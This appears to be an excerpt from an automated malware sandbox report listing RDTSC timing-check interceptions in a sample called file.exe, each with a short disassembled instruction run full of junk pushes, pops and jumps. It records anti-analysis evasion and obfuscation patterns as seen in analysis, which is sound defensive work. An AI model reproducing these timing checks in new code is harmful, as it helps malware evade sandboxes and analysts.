Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECD365 second address: ECD369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECD145 second address: ECD14F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD25CDB1976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECD14F second address: ECD153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECF05F second address: ECF064 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED345E second address: ED3462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3462 second address: ED3468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3468 second address: ED3476 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED454E second address: ED4563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007FD25CDB1978h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4563 second address: ED456C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED566F second address: ED5674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED19FA second address: ED19FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED2459 second address: ED245F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5674 second address: ED5679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED19FE second address: ED1A32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD25CDB1988h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED36A4 second address: ED36A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87B3D second address: E87B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED36A8 second address: ED36BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A633h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87B41 second address: E87B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87B47 second address: E87B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007FD25C84A626h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED7C40 second address: ED7C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED7C44 second address: ED7C55 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD25C84A626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED7C55 second address: ED7C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED7C5B second address: ED7C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED8D16 second address: ED8D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FD25CDB1976h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED8D27 second address: ED8D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED7E8E second address: ED7E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED8D2D second address: ED8D9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD25C84A62Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D209Ah] 0x00000011 mov edi, 425C044Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FD25C84A628h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D1E5Eh], eax 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+12471C62h], esi 0x00000040 pushad 0x00000041 or dword ptr [ebp+1246ABFFh], edx 0x00000047 sub si, 108Dh 0x0000004c popad 0x0000004d xchg eax, esi 0x0000004e jmp 00007FD25C84A62Ch 0x00000053 push eax 0x00000054 pushad 0x00000055 jg 00007FD25C84A628h 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED7E92 second address: ED7EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD25CDB197Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9C74 second address: ED9C86 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD25C84A628h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED8EB4 second address: ED8EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D24 second address: ED9D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D40 second address: ED9D47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D47 second address: ED9D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D55 second address: ED9D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9D5D second address: ED9D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDADF7 second address: EDAE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD25CDB1987h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBDD0 second address: EDBDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBDD6 second address: EDBDDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBDDA second address: EDBDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FD25C84A628h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0456 second address: EE046C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD25CDB197Ch 0x00000008 jnl 00007FD25CDB1976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE046C second address: EE0470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0470 second address: EE0490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE15A9 second address: EE15E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 sub dword ptr [ebp+12459B11h], eax 0x0000000c push 00000000h 0x0000000e mov edi, 14B47DA4h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FD25C84A628h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub di, ED51h 0x00000034 xchg eax, esi 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE15E7 second address: EE15EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE25E7 second address: EE25FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007FD25C84A626h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF534 second address: EDF538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE063A second address: EE0640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF538 second address: EDF53C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0640 second address: EE0644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF53C second address: EDF5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FD25CDB1978h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007FD25CDB1981h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e add bh, 00000039h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 add bh, 00000044h 0x0000003b mov eax, dword ptr [ebp+122D063Dh] 0x00000041 jmp 00007FD25CDB197Dh 0x00000046 push FFFFFFFFh 0x00000048 jmp 00007FD25CDB1984h 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FD25CDB197Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF5C7 second address: EDF5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD25C84A626h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDF5D1 second address: EDF5EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB197Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d jno 00007FD25CDB197Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0720 second address: EE0726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0726 second address: EE0730 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD25CDB197Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE17C0 second address: EE17DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A62Eh 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD25C84A628h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE4518 second address: EE456F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FD25CDB197Dh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FD25CDB1978h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+12447131h] 0x00000032 push 00000000h 0x00000034 add dword ptr [ebp+122D3681h], eax 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push ebx 0x0000003d push edx 0x0000003e pop edx 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE456F second address: EE4599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD25C84A639h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FD25C84A626h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE37FF second address: EE3804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE4599 second address: EE459D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE3804 second address: EE382D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FD25CDB1976h 0x00000009 jo 00007FD25CDB1976h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 jnl 00007FD25CDB1978h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD25CDB197Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE4755 second address: EE475F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD25C84A626h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8CB4A second address: E8CB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD25CDB1976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEE7A3 second address: EEE7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEEA33 second address: EEEA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25CDB197Dh 0x00000009 js 00007FD25CDB1976h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEEA4F second address: EEEA64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FD25C84A62Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF4DDE second address: EF4DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007FD25CDB1976h 0x0000000c popad 0x0000000d jo 00007FD25CDB197Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jns 00007FD25CDB1976h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF68DC second address: EF68E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF68E0 second address: EF68F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD25CDB1976h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF68F1 second address: EF68F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF68F7 second address: EF690F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FD25CDB197Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF690F second address: EF6913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6913 second address: EF6919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6919 second address: EF691D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF691D second address: EF692F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF69CB second address: EF6A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A631h 0x00000009 popad 0x0000000a push eax 0x0000000b jno 00007FD25C84A630h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jp 00007FD25C84A639h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e jp 00007FD25C84A62Ch 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jl 00007FD25C84A634h 0x0000002f push eax 0x00000030 push edx 0x00000031 jng 00007FD25C84A626h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFADCC second address: EFADDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jnp 00007FD25CDB1976h 0x0000000c pop edi 0x0000000d pop esi 0x0000000e push edi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFADDE second address: EFADE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFB0B3 second address: EFB0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFB276 second address: EFB27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFFE68 second address: EFFE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFFE6C second address: EFFE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A630h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD25C84A631h 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FD25C84A626h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFFE9D second address: EFFEA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFFEA3 second address: EFFED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD25C84A63Fh 0x0000000c jmp 00007FD25C84A62Ah 0x00000011 jmp 00007FD25C84A62Fh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD25C84A62Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFFED9 second address: EFFEDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFECAA second address: EFECCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25C84A639h 0x00000009 jng 00007FD25C84A626h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8A9C second address: EC8AA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD25CDB1976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8C59 second address: EC8C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8C61 second address: EC8C6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC8C6F second address: EC8C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC9356 second address: EC9360 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD25CDB1976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC9360 second address: EC9366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
